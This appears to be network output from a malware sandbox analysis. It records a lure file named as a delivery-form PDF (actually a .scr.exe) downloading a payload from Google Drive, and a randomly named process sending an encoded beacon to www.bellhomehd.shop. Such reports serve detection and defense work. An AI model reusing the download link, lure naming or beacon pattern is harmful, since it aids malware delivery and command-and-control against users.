Dec 26, 2024 11:52:08.461157084 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.461163998 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.461580038 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.461623907 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.461632013 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.462481022 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.462527037 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.462534904 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.471417904 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.471468925 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.471476078 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.471782923 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.471832037 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.471839905 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.472793102 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.472839117 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.472846031 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.485589027 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.485635996 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.485644102 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.486027002 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.486073971 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.486082077 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.486984968 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.487030029 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.487037897 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.501422882 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.501476049 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.501483917 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.501861095 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.501907110 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.501914978 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.502865076 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.502919912 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.502927065 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.512454987 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.512504101 CET | 49732 | 443 | 192.168.2.4 | 142.250.181.97
Dec 26, 2024 11:52:08.512511015 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
Dec 26, 2024 11:52:08.512926102 CET | 443 | 49732 | 142.250.181.97 | 192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.512976885 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.512984037 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.513956070 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.514000893 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.514008045 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.529901981 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.529963017 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.529973984 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.530342102 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.530395031 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.530401945 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.531109095 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.531181097 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.531189919 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.542313099 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.542376041 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.542387009 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.542732000 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.542787075 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.542794943 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.543673992 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.543720961 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.543730021 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.555538893 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.555603981 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.555605888 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.555620909 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.555664062 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.556082010 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.556895971 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.556941032 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.556950092 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.565886974 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.565941095 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.565948963 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.566225052 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.566267967 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.566281080 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.567015886 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.567063093 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.567070007 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.576611042 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.576666117 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.576674938 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.576932907 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.577018976 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.577025890 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.577842951 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.577892065 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.577899933 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.583913088 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.583964109 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.583971977 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.584305048 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.584348917 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.584357023 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.585403919 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.585447073 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.585453987 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.612198114 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.612243891 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.612255096 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.612596989 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.612646103 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.612654924 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.613607883 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.613661051 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.613667965 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.659624100 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.659656048 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.659682035 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.659689903 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.659732103 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.660425901 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.661293983 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.661335945 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.661343098 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.662322998 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.662365913 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.662373066 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.663328886 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.663374901 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.663382053 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.664071083 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.664114952 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.664122105 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.665750980 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.665795088 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.665802956 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.666630983 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.666673899 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.666681051 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.667578936 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.667622089 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.667629004 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.668396950 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.668438911 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.668447018 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.669328928 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.669373035 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.669379950 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.670264959 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.670308113 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.670315981 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.671825886 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.671866894 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.671875000 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.673125982 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.673167944 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.673176050 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.674005032 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.674051046 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.674061060 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.683068037 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.683124065 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.683132887 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.683983088 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.684024096 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.684031010 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.696088076 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.696130037 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.696139097 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.696557999 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.696599007 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.696604967 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.697439909 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.697479963 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.697485924 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.698307991 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.698352098 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.698359966 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.712500095 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.712543964 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.712552071 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.713321924 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.713367939 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.713375092 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.723200083 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.723243952 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.723246098 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.723254919 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.723295927 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.723720074 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.724456072 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.724494934 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.724503040 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740241051 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740293980 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.740302086 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740705013 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.740750074 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.740757942 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.741502047 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.741545916 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.741554022 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.752815008 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.752886057 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.752892017 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.753232002 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.753278971 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.753285885 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754261971 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754291058 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754314899 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.754323959 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.754368067 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.766252041 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.766702890 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.766741037 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.766748905 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.767617941 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.767658949 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.767666101 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776222944 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776272058 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:08.776283026 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776561975 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:08.776599884 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117679119 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.117731094 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.117738008 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.120812893 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.120862007 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.120870113 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136826992 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136867046 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136876106 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.136884928 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.136940956 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.137729883 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.138484955 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.138528109 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.138535976 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.147721052 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.147762060 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.147770882 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148236990 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148241997 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148269892 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148282051 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148292065 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:52:09.148299932 CET49732443192.168.2.4142.250.181.97
                                                                                        Dec 26, 2024 11:52:09.148303986 CET44349732142.250.181.97192.168.2.4
                                                                                        Dec 26, 2024 11:53:06.960788965 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.080734968 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:07.080816984 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.091793060 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:07.211474895 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269448996 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269510984 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269568920 CET8049756199.59.243.227192.168.2.4
                                                                                        Dec 26, 2024 11:53:08.269716978 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.269716978 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.272685051 CET4975680192.168.2.4199.59.243.227
                                                                                        Dec 26, 2024 11:53:08.392226934 CET8049756199.59.243.227192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 11:51:59.920150042 CET | 51980 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 11:52:00.058281898 CET | 53 | 51980 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 11:52:02.797939062 CET | 62113 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 11:52:02.936117887 CET | 53 | 62113 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 11:53:06.388422012 CET | 55230 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 11:53:06.948565006 CET | 53 | 55230 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 11:51:59.920150042 CET | 192.168.2.4 | 1.1.1.1 | 0x7fd6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 26, 2024 11:52:02.797939062 CET | 192.168.2.4 | 1.1.1.1 | 0xb3e4 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 26, 2024 11:53:06.388422012 CET | 192.168.2.4 | 1.1.1.1 | 0xf013 | Standard query (0) | www.bellhomehd.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 11:52:00.058281898 CET | 1.1.1.1 | 192.168.2.4 | 0x7fd6 | No error (0) | drive.google.com | | 172.217.19.238 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 11:52:02.936117887 CET | 1.1.1.1 | 192.168.2.4 | 0xb3e4 | No error (0) | drive.usercontent.google.com | | 142.250.181.97 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 11:53:06.948565006 CET | 1.1.1.1 | 192.168.2.4 | 0xf013 | No error (0) | www.bellhomehd.shop | 94950.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 26, 2024 11:53:06.948565006 CET | 1.1.1.1 | 192.168.2.4 | 0xf013 | No error (0) | 94950.bodis.com | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
                                                                                        • drive.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • www.bellhomehd.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49756 | 199.59.243.227 | 80 | 5684 | C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 11:53:07.091793060 CET | 497 | OUT | GET /7l3h/?64S=LVahBLZpOHw0&ltuttt-X=6zLgQVJeSE3kO4Sf+RLctODToVrPhYaQ0c4BWNSIp+OQ9yx8H1ct7jyxXPxozjpZEa0Pz8J6l7jjf+e1lE7ZvAiUMQsmdIIWqY7TwFLSKhERhv9WS2Ztltg= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.bellhomehd.shop
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 26, 2024 11:53:08.269448996 CET | 1236 | IN | HTTP/1.1 200 OK
date: Thu, 26 Dec 2024 10:53:07 GMT
content-type: text/html; charset=utf-8
content-length: 1474
x-request-id: 3cf22859-8ac3-40bf-8840-fef920e4c4bc
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nxbk2XTjBeaku/F1lxqXI3oknC+w6DwSkZUytYFf1HA+gjTCII79cwBEoXiz3sVgCdMd1Qwwi1jCe1RVExx97A==
set-cookie: parking_session=3cf22859-8ac3-40bf-8840-fef920e4c4bc; expires=Thu, 26 Dec 2024 11:08:08 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nxbk2XTjBeaku/F1lxqXI3oknC+w6DwSkZUytYFf1HA+gjTCII79cwBEoXiz3sVgCdMd1Qwwi1jCe1RVExx97A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 26, 2024 11:53:08.269510984 CET | 927 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2NmMjI4NTktOGFjMy00MGJmLTg4NDAtZmVmOTIwZTRjNGJjIiwicGFnZV90aW1lIjoxNzM1MjEwMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 172.217.19.238 | 443 | 6600 | C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 10:52:01 UTC | 205 | OUT | GET /uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.google.com
2024-12-26 10:52:02 UTC | 1319 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
